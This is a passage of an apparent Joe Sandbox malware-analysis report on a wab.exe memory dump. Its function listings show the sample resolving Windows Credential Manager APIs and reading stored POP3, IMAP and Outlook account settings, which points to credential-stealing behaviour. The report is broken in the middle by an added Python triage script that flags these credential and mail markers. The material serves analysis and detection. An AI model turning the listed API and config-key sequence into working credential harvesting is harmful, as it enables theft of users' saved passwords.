                                                              • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                              • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                              • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                              APIs
                                                                • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                              • wcslen.MSVCRT ref: 0040874A
                                                              • _wcsncoll.MSVCRT ref: 00408794
                                                              • memset.MSVCRT ref: 0040882A
                                                              • memcpy.MSVCRT ref: 00408849
                                                              • wcschr.MSVCRT ref: 0040889F
                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                                              • String ID: J$Microsoft_WinInet
                                                              • API String ID: 2203907242-260894208
                                                              • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                              • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                              • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                              • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
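The blocks above come from functions in the wab.exe memory dump (snapshot hcaresult_18_2_400000_wab.jbxd) that resolve CredReadA, CredEnumerateA and CredEnumerateW from advapi32.dll through GetProcAddress, that carry mail-account strings such as imap://%s@%s, PopServer and %s@gmail.com, and that embed SQLite journal strings (-journal, -wal). Reading hundreds of these entries by hand is slow, so the following Python, an added example that is not part of the Joe Sandbox report or of the analysed sample, parses blocks in this exact layout and tags the ones that resolve Credential Manager APIs at run time or that carry mail or SQLite markers. REPORT_EXCERPT is a constructed, shortened copy of three blocks from this report; the tag names and the marker lists are assumptions of the example, not Joe Sandbox terminology.

```python
"""Triage helper for Joe Sandbox 'IDA Plugin' function blocks.

Added example, not part of the report: it parses the APIs / Strings /
Similarity blocks and flags functions that resolve Credential Manager
APIs through GetProcAddress or carry mail-account / SQLite strings.
"""
import re
from dataclasses import dataclass, field

# Constructed, shortened copy of three blocks from the report above.
REPORT_EXCERPT = """\
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
• GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
• GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
Strings
Memory Dump Source
• Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
• Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
APIs
  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
• strchr.MSVCRT ref: 0040371F
• sprintf.MSVCRT ref: 0040379C
Strings
Similarity
• API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
• String ID: %s@gmail.com
• Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
APIs
Strings
Similarity
• API ID: memcpy$strlen
• String ID: -journal$-wal$immutable$nolock
• Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
"""

# One API line: optional "Part of subcall function XXXX:" prefix, then Name.Module(args)
API_RE = re.compile(
    r"•\s+(?:Part of subcall function [0-9A-Fa-f]+:\s+)?(\w+)\.(\w+)(?:\(([^)]*)\))?"
)
# Marker lists are assumptions of this example, chosen from strings seen in the report.
CRED_APIS = re.compile(r"^Cred(Enumerate|Read|Write|Delete|Free)[AW]?$")
MAIL_MARKERS = ("imap://", "mailbox://", "PopServer", "PopAccount",
                "@gmail.com", "Microsoft_WinInet")
SQLITE_MARKERS = ("-journal", "-wal", "ROLLBACK")


@dataclass
class FuncBlock:
    opcode_id: str = ""
    apis: list = field(default_factory=list)     # (name, module, [args])
    strings: list = field(default_factory=list)  # entries of "String ID"
    tags: set = field(default_factory=set)


def parse_blocks(text):
    """Split the report text into FuncBlock records, one per 'APIs' heading."""
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FuncBlock()
            blocks.append(cur)
            section = "apis"
            continue
        if cur is None:
            continue
        if line in ("Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"):
            section = line
            continue
        if line.startswith("• String ID:"):
            value = line.split(":", 1)[1].strip()
            cur.strings = [s for s in value.split("$") if s]   # '$' separates strings
        elif line.startswith("• Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
        elif section == "apis":
            m = API_RE.match(line)
            if m:
                args = [a.strip() for a in m.group(3).split(",")] if m.group(3) else []
                cur.apis.append((m.group(1), m.group(2), args))
    return blocks


def resolved_procs(block):
    """Names passed to GetProcAddress, i.e. imports the code resolves at run time."""
    return [args[-1] for name, _, args in block.apis if name == "GetProcAddress" and args]


def tag_block(block):
    tags = set()
    if any(CRED_APIS.match(p) for p in resolved_procs(block)):
        tags.add("credman_api")
    if any(mk in s for s in block.strings for mk in MAIL_MARKERS):
        tags.add("mail_creds")
    if any(mk in s for s in block.strings for mk in SQLITE_MARKERS):
        tags.add("sqlite")
    block.tags = tags
    return tags


def triage(text):
    """Return only the blocks that received at least one tag, in report order."""
    blocks = parse_blocks(text)
    return [b for b in blocks if tag_block(b)]


if __name__ == "__main__":
    for b in triage(REPORT_EXCERPT):
        print(b.opcode_id[:16], sorted(b.tags), resolved_procs(b) or b.strings[:3])
```

Run it against a saved copy of the report text instead of REPORT_EXCERPT to get the short list of functions worth opening in the disassembler; matching on the GetProcAddress argument rather than on the String ID field avoids flagging functions that merely contain the API name as data.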
                                                              APIs
                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                              • _mbscpy.MSVCRT ref: 00409686
                                                              • _mbscpy.MSVCRT ref: 00409696
                                                              • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                              • API String ID: 888011440-2039793938
                                                              • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                              • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                              • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                              • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                              APIs
                                                                • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                              • strchr.MSVCRT ref: 0040327B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringstrchr
                                                              • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                              • API String ID: 1348940319-1729847305
                                                              • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                              • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                              • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                              • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                              • API String ID: 3510742995-3273207271
                                                              • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                              • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                              • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                              • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                              APIs
                                                                • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                • Part of subcall function 00410863: memcpy.MSVCRT ref: 004108C3
                                                              • strchr.MSVCRT ref: 0040371F
                                                              • _mbscpy.MSVCRT ref: 00403748
                                                              • _mbscpy.MSVCRT ref: 00403758
                                                              • strlen.MSVCRT ref: 00403778
                                                              • sprintf.MSVCRT ref: 0040379C
                                                              • _mbscpy.MSVCRT ref: 004037B2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                                              • String ID: %s@gmail.com
                                                              • API String ID: 500647785-4097000612
                                                              • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                              • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                              • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                              • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                              APIs
                                                              • memset.MSVCRT ref: 004094C8
                                                              • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                              • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                              • memset.MSVCRT ref: 0040950C
                                                              • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                              • _strcmpi.MSVCRT ref: 00409531
                                                                • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                              • String ID: sysdatetimepick32
                                                              • API String ID: 3411445237-4169760276
                                                              • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                              • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                              • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                              • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                              APIs
                                                              • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                              • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                              • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                              • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                              • GetSysColor.USER32(0000000F), ref: 0040B472
                                                              • DeleteObject.GDI32(?), ref: 0040B4A6
                                                              • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                              • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DeleteImageLoadObject$Color
                                                              • String ID:
                                                              • API String ID: 3642520215-0
                                                              • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                              • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                              • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                              • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                              APIs
                                                              • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                              • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                              • GetDC.USER32(00000000), ref: 004072FB
                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                              • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                              • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                              • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                              • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                              • String ID:
                                                              • API String ID: 1999381814-0
                                                              • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                              • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                              • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                              • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                              • API String ID: 1297977491-3883738016
                                                              • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                              • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                              • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                              • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                              APIs
                                                                • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                                                                • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                                                              • memcpy.MSVCRT ref: 0044972E
                                                              • memcpy.MSVCRT ref: 0044977B
                                                              • memcpy.MSVCRT ref: 004497F6
                                                                • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                                                                • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                                                              • memcpy.MSVCRT ref: 00449846
                                                              • memcpy.MSVCRT ref: 00449887
                                                              • memcpy.MSVCRT ref: 004498B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: gj
                                                              • API String ID: 438689982-4203073231
                                                              • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                              • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                              • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                              • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm$__aullrem
                                                              • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                              • API String ID: 643879872-978417875
                                                              • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                              • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                              • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                              • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                              APIs
                                                              • memset.MSVCRT ref: 0040810E
                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                              • LocalFree.KERNEL32(?,?,?,?,?,00000000,75A8EB20,?), ref: 004081B9
                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                              • String ID: POP3_credentials$POP3_host$POP3_name
                                                              • API String ID: 524865279-2190619648
                                                              • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                              • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                              • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                              • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$CountInfomemsetstrchr
                                                              • String ID: 0$6
                                                              • API String ID: 2300387033-3849865405
                                                              • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                              • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                              • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                              • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbscat$memsetsprintf
                                                              • String ID: %2.2X
                                                              • API String ID: 125969286-791839006
                                                              • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                              • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                              • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                              • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                              APIs
                                                                • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                              • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                                                                • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                                                              • CloseHandle.KERNEL32(?), ref: 00444206
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                              • String ID: ACD
                                                              • API String ID: 1886237854-620537770
                                                              • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                                              • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                              • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                                              • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                              APIs
                                                              • memset.MSVCRT ref: 004091EC
                                                              • sprintf.MSVCRT ref: 00409201
                                                                • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                                                              • SetWindowTextA.USER32(?,?), ref: 00409228
                                                              • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                              • String ID: caption$dialog_%d
                                                              • API String ID: 2923679083-4161923789
                                                              • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                              • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                              • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                              • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                              • memset.MSVCRT ref: 00410246
                                                              • memset.MSVCRT ref: 00410258
                                                                • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                                                              • memset.MSVCRT ref: 0041033F
                                                              • _mbscpy.MSVCRT ref: 00410364
                                                              • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                              • String ID:
                                                              • API String ID: 3974772901-0
                                                              • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                              • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                              • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                              • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                              APIs
                                                              • wcslen.MSVCRT ref: 0044406C
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
